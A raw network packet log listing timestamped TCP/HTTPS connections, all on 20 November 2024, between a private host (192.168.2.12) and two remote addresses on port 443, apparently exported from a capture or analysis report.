                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.812020063 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.814980030 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.815959930 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.815970898 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.819511890 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.821079969 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.821086884 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.821371078 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.822097063 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.822226048 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.822285891 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.824549913 CET49810443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.824573994 CET44349810104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.825958014 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.826822996 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.826908112 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.826966047 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827007055 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827048063 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827083111 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827337980 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827523947 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827534914 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.827919960 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.831672907 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.831875086 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.838057041 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.840289116 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.840500116 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.840534925 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.841463089 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.841674089 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.841711998 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.842959881 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.843007088 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.844185114 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.844198942 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.846668005 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.846685886 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.846694946 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.846694946 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.846703053 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.847666025 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.847723007 CET49819443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.847733974 CET44349819104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849776030 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849818945 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849839926 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849841118 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849843979 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849848986 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849864006 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.849869013 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850251913 CET49822443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850261927 CET44349822104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850378036 CET49821443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850397110 CET44349821104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850507021 CET49820443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.850513935 CET44349820104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.853595018 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.855762005 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.855783939 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.856481075 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.856515884 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.856777906 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.862663031 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.864053965 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.865655899 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.868706942 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.868771076 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.869965076 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.871331930 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.871342897 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.893362045 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.908015013 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.922907114 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.934288025 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.934355974 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.934443951 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.935355902 CET49809443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.935376883 CET44349809104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.937817097 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.937850952 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.938160896 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.938389063 CET49823443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.938400984 CET44349823104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.942382097 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.942428112 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.942632914 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.942765951 CET49824443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.942789078 CET44349824104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.944725037 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.944937944 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.947664022 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.949615002 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.949908018 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.950604916 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.951076984 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.951323986 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.953120947 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.953196049 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.953207016 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.957036972 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.961497068 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.961556911 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.961569071 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.963432074 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.963457108 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.963501930 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.963510036 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.963639975 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.965540886 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.965719938 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.965727091 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.966944933 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.971129894 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.971256018 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.971384048 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.971582890 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.971843958 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.972559929 CET49807443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.972577095 CET44349807104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.973750114 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.977870941 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.977893114 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.981992960 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.982081890 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.986833096 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.986833096 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.986849070 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.986861944 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.990556955 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.990583897 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.993454933 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.993454933 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.993465900 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.993479013 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.993494987 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.994245052 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.994312048 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.994412899 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.997507095 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.997555017 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.997865915 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.997886896 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.998406887 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.998655081 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.998755932 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.998769999 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.999573946 CET49825443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:45.999592066 CET44349825104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.002120018 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.005029917 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.005052090 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.005848885 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.005855083 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.006498098 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.006593943 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.006684065 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.007653952 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.012523890 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.012542963 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.020333052 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.020382881 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.023044109 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.023068905 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.032155991 CET49804443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.032175064 CET44349804104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.032908916 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.035248995 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.035332918 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.038072109 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.042979002 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.043059111 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.050827026 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.051008940 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.053267002 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.053283930 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.053296089 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.057009935 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.058725119 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.061364889 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.062431097 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.062515020 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.063596964 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.063637018 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.066658974 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.069219112 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.069257975 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070107937 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070123911 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070210934 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070627928 CET49828443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070641041 CET44349828104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070771933 CET49827443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070801020 CET44349827104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070898056 CET49826443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.070915937 CET44349826104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.074449062 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.074498892 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.078373909 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.078387976 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.083178043 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.085485935 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.085493088 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.089863062 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.090272903 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.102689028 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.102854013 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.102864981 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.108912945 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.108972073 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.108978033 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.109030008 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.109385014 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.110081911 CET49806443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.110097885 CET44349806104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.149357080 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.149370909 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.149414062 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.149430990 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.150237083 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.150273085 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.150434971 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.156094074 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.156121016 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.157506943 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.157515049 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.157990932 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.163434982 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.163459063 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.163521051 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.163528919 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.163655996 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.169651031 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.169680119 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.169848919 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.169861078 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.170034885 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.176392078 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.176413059 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.176462889 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.176477909 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.176608086 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.182496071 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.182519913 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.182588100 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.182600021 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.182765961 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.185627937 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.185724974 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.192378044 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.192406893 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.192478895 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.192490101 CET44349794104.16.102.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.192620993 CET49794443192.168.2.12104.16.102.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.203896999 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.203932047 CET44349829104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204041004 CET49830443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204086065 CET44349830104.16.103.112192.168.2.12
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204127073 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204449892 CET49829443192.168.2.12104.16.103.112
                                                                                                                                                                                                                                                                    Nov 20, 2024 16:01:46.204463959 CET44349829104.16.103.112192.168.2.12
